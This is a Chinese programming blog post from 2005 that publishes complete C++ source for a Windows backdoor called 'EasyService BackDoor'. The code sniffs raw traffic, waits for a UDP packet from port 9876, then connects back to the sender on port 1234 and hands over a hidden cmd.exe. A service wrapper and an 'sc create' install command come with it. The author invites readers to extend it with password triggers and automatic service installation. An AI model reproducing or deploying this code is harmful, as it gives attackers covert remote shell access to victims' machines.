企业即时通讯 - Enterprise Instant Messenger

局域网聊天工具，文字讯息、文件发送、语音通讯、高清视频通讯、远程桌面控制。

用户操作

[即时聊天] [发私信] [加为好友]

FreeEIM StudioID：i_like_cpp

共972460次访问，排名32，好友4人，关注者7人。

i_like_cpp的文章

原创 888 篇

翻译 4 篇

转载 69 篇

评论 1148 篇

FreeEIM Studio的公告

最近评论

ScanerKi：#include <stdio.h>

int asm(int s)
{
int t=0;
__asm
{
mov eax, DWORD PTR [ebp+8] ;把s的值传给eax
mov t, eax ;把eax的值传给t
}
printf("- %d……

li_delong：谢谢

XUETUJIAN：高

文章分类

内存管理与指针 (RSS)

收藏

相册

EIM 截图

headerf.h收藏

新一篇: 内核级利用通用Hook函数方法检测进程 | 旧一篇: 反弹式后门代码

headerf.h

这里面放了公共函数，还有一些声明

代码

#ifndef _BDH_
#define _BDH_
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)

typedef struct _iphdr{
unsigned char h_lenver;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_frag;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;

typedef struct _udphdr{
unsigned short uh_sport;
unsigned short uh_dport;
unsigned short uh_len;
unsigned short uh_sum;
}UDP_HEADER;

extern int StartSniffer();
extern void StartWSA();
extern void returnMessage(SOCKET *Sock,char *msg);
extern void CreatePipeInSock();
extern int SetSocketHandle(SOCKET *Sock);
extern int ContoReServer(SOCKET *sock, unsigned short port, char *reAddr);

#endif

这里就是sniffer...这个sniffer只解析IP和UDP包。。。通过对UDP的解析来启动木马进程.
对于UDP解析来启动木马这块还没有怎么完善。只是很简单的。。。等待大家来补充了。。

最好解析UDP来提取内容。判断用户名。密码。然后启动木马进程
sniffer.cpp

代码

#include "headerf.h"
//---------------------------------------------------------------------------

//-----------------------------
char rcvbuf[65535];
SOCKADDR_IN siSource;
extern SOCKET ReSock;
char SourceIPAddr[16];
unsigned short SourcePort;
bool CanCon=true;
char WelcomeBuff[200] = "++++++++++++++++++++++++++++++++++++\r\n"
"+EasyService BackDoor\r\n"
"+Coder By weibo(wbwap@sina.com)\r\n"
"+Site http://www.s8s8.net\r\n"
"++++++++++++++++++++++++++++++++++++\r\n";
//-----------------------------
void DecodeIpPack(char *buf,int irec);
void DecodeUdpPack(char *buf,unsigned int buflen);
int msGetip(char *ipin, char* ipout);
void StartBackDoor(SOCKET *Sock,char *IPaddr);
//------------------------------
int StartSniffer()
{
SOCKET SniffSock;
struct sockaddr_in addr;
unsigned char LocalName[256];
struct hostent * hp;
int ntime=1000;
int rec;
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
char in[20]="",out[20]="";
StartWSA();
SniffSock = socket(AF_INET,SOCK_RAW,IPPROTO_IP);
setsockopt(SniffSock,SOL_SOCKET,SO_RCVTIMEO,(char*)&ntime,sizeof(ntime));
addr.sin_family = AF_INET;
addr.sin_port = INADDR_ANY;
msGetip(in,out);
addr.sin_addr.S_un.S_addr = inet_addr(out);
bind(SniffSock,(PSOCKADDR)&addr, sizeof(addr));
WSAIoctl(SniffSock,SIO_RCVALL,&dwBufferInLen,sizeof(dwBufferInLen),&dwBufferLen,sizeof(dwBufferLen),&dwBytesReturned ,NULL ,NULL);
while(1)
{
memset(rcvbuf,0,sizeof(rcvbuf));
rec = recv(SniffSock,rcvbuf,sizeof(rcvbuf),0);
DecodeIpPack(rcvbuf,rec);

}
}
//---------------------------------------------------------------------------
void DecodeIpPack(char *buf,int irec)
{
int iproto;
int iIphlen;
IP_HEADER *pIPheader;
pIPheader = (IP_HEADER *)buf;
iproto=pIPheader->proto;
iIphlen = sizeof(unsigned long) * (pIPheader->h_lenver & 0xf);

if (iproto == IPPROTO_UDP)
{
siSource.sin_addr.s_addr = pIPheader->sourceIP;
strncpy(SourceIPAddr,inet_ntoa(siSource.sin_addr),16);
//printf("包类型:%s\n源IP:%s ","UDP",SourceIPAddr);
DecodeUdpPack(buf+iIphlen,irec);
}

}

void DecodeUdpPack(char *buf,unsigned int buflen)
{
char str[10];
UDP_HEADER *pUdpheader;
pUdpheader=(UDP_HEADER *)buf;
siSource.sin_port = pUdpheader->uh_sport;
SourcePort=ntohs(siSource.sin_port);

//这个地方就是判断是否启动进程的地方！！！！！！！！！！！！！！！！！！！
//这里是如果塬端口为9876 才会起动木马进程。。连接你的1234断口这些都可以改
//最好的方法是Decode UDP包。。然后分析内容。。。作判断是否打开木马。。。。
//没时间了。。。。

if(CanCon)
{
if(SourcePort == 9876)
{
StartBackDoor(&ReSock,SourceIPAddr);
}
CanCon=false;
}
}

int msGetip(char *ipin, char* ipout)
{
char cHostName[80]="";
if((gethostname(cHostName, 80)) == SOCKET_ERROR)
return false;
struct hostent *Host = gethostbyname(cHostName);
if(NULL!=Host){
struct in_addr addr;
int i = 0;
while(Host->h_addr_list[i] != NULL){
memcpy(&addr, Host->h_addr_list[i], sizeof(addr));
if(addr.S_un.S_un_b.s_b1 == 192 && addr.S_un.S_un_b.s_b2 == 168){
if(strlen(ipin) == 0){
strcpy(ipin, inet_ntoa(addr));
}
}else if(addr.S_un.S_un_b.s_b1 == 172 && (addr.S_un.S_un_b.s_b2 >= 16 && addr.S_un.S_un_b.s_b2 <= 131)){
if(strlen(ipin) == 0){
strcpy(ipin, inet_ntoa(addr));
}
}else if(addr.S_un.S_un_b.s_b1 == 10 ){
if(strlen(ipin) == 0){
strcpy(ipin, inet_ntoa(addr));
}
}else{
if(strlen(ipout) == 0){
strcpy(ipout, inet_ntoa(addr));
}
}
i++;
}
if(strlen(ipout) == 0) {
strcpy(ipout, ipin);
}
if(strlen(ipin) == 0){
strcpy(ipin, ipout);
}
return 1;
}
return 0;
}

void StartBackDoor(SOCKET *Sock,char *IPaddr)
{
int rec;
//StartWSA();
SetSocketHandle(Sock);
rec = ContoReServer(Sock,1234,IPaddr);
returnMessage(Sock,WelcomeBuff);
CreatePipeInSock();
switch(rec)
{
case 0:
closesocket(ReSock);
CanCon = true;
break;
case 1:
CanCon = false;
break;
}
}

这就是服务的主体。。。。。。。

本来还有个自动加为服务的功能。。。没时间了，马上走了。收拾东西去。。~~~~ZV来写吧。。。。
可以用 CreateService()函数。。
服务这块需要大家来改进~~

con.cpp

代码

#include "headerf.h"
//---------------------------------------------------------------------------
STARTUPINFO si;
PROCESS_INFORMATION pi;
SOCKET ReSock;
//-------------------------------

//---------------------------
void StartWSA()
{
WSADATA wsa;

WSAStartup(MAKEWORD(2,2),&wsa);
}

int ContoReServer(SOCKET *sock, unsigned short port, char *reAddr)
{
int namelen;
struct sockaddr_in server_addr;
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
server_addr.sin_addr.S_un.S_addr = inet_addr(reAddr);
namelen = sizeof(server_addr);
if(connect(*sock, (SOCKADDR *)&server_addr,namelen) < 0 )
return 0;
return 1;
}

int SetSocketHandle(SOCKET *Sock)
{
*Sock = WSASocket(PF_INET,SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if(*Sock == SOCKET_ERROR)
return 0;
return 1;
}

void returnMessage(SOCKET *Sock,char *msg)
{
if (strlen(msg) <= 0)
return;
send(*Sock,msg,strlen(msg),0);
}
//下面这个是重订向si到Resock....等于一个简单的管道。。
//没太多时间。为了省事。。能实现cmd.
//最好能改写成管道CreatePipe()..
//这样可以对数据进行分析。。以便加入别的控制。。。。。。
void CreatePipeInSock()
{
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)ReSock;
CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
}

backdoor.cpp

代码

#include "headerf.h"
//---------------------------------------------------------------------------
const int c_nEventCt = 3;
const int c_nEventIndexPause = 0;
const int c_nEventIndexContinue = 1;
const int c_nEventIndexStop = 2;
HANDLE g_arEventControl[c_nEventCt];
SERVICE_STATUS_HANDLE g_ssh;
DWORD g_dwStatus = SERVICE_STOPPED;
#pragma argsused
//服务状态给SCM
void SetStatus(DWORD dwStatus)
{
SERVICE_STATUS ss =
{
SERVICE_WIN32_OWN_PROCESS,
SERVICE_STOPPED,
SERVICE_ACCEPT_PAUSE_CONTINUE|
SERVICE_ACCEPT_STOP,
NO_ERROR,
0,
1,
5000
};
ss.dwCurrentState = dwStatus;
SetServiceStatus(g_ssh,&ss);
g_dwStatus = dwStatus;
}

//命令处理
VOID __stdcall Handler(DWORD dwCtl)
{
switch(dwCtl)
{
case SERVICE_CONTROL_STOP:
WSACleanup();
break;

default:
//nomal
break;
}
}

bool HandleControl()
{
bool bContinueRunning(true);

DWORD dwWait = WaitForMultipleObjects(
c_nEventCt,
g_arEventControl,
FALSE,
0
);
int nIndex = dwWait - WAIT_OBJECT_0;
if(nIndex>=0 && nIndex<c_nEventCt)
{
ResetEvent(g_arEventControl[nIndex]);

switch(nIndex)
{
case c_nEventIndexPause:
SetStatus(SERVICE_PAUSED);
break;
case c_nEventIndexContinue:
SetStatus(SERVICE_RUNNING);
break;
case c_nEventIndexStop:
SetStatus(SERVICE_STOP_PENDING);
bContinueRunning = false;
break;
}
}
return (bContinueRunning);
}

VOID __stdcall ServiceMain(DWORD dwArgc,LPSTR* lpszArgv)
{
g_arEventControl[c_nEventIndexPause] = CreateEvent(NULL,TRUE,FALSE,NULL);
g_arEventControl[c_nEventIndexContinue] = CreateEvent(NULL,TRUE,FALSE,NULL);
g_arEventControl[c_nEventIndexStop] = CreateEvent(NULL,TRUE,FALSE,NULL);

g_ssh = RegisterServiceCtrlHandler(lpszArgv[0],Handler);

SetStatus(SERVICE_START_PENDING);
SetStatus(SERVICE_RUNNING);

while(HandleControl())
{
if(g_dwStatus == SERVICE_RUNNING)
{

StartSniffer();

}

}

for(int nEvent = 0;nEvent < c_nEventCt;++nEvent)
{
CloseHandle(g_arEventControl[nEvent]);
g_arEventControl[nEvent] = INVALID_HANDLE_VALUE;

}

SetStatus(SERVICE_STOPPED);
}

int __stdcall WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
SERVICE_TABLE_ENTRY arSvc[] =
{
{"ConEvent",ServiceMain},
{NULL,NULL}
};

StartServiceCtrlDispatcher(arSvc);
return 0;
}

手动加为服务

编译好后
进入cmd

运行 sc create 随便一个名字 binpath= path

例子: sc create BackDoor binpath= c:\backdoor.exe

这个很草。。。。。。等我度过军训。有时间了。。回来再写~~~~88

附件是我用bcb6写的。。。

发表于 @ 2005年06月28日 09:37:00|评论(loading...)|编辑

新一篇: 内核级利用通用Hook函数方法检测进程 | 旧一篇: 反弹式后门代码

评论：没有评论。

发表评论

姓名：
主页：
校验码：看不清,换一张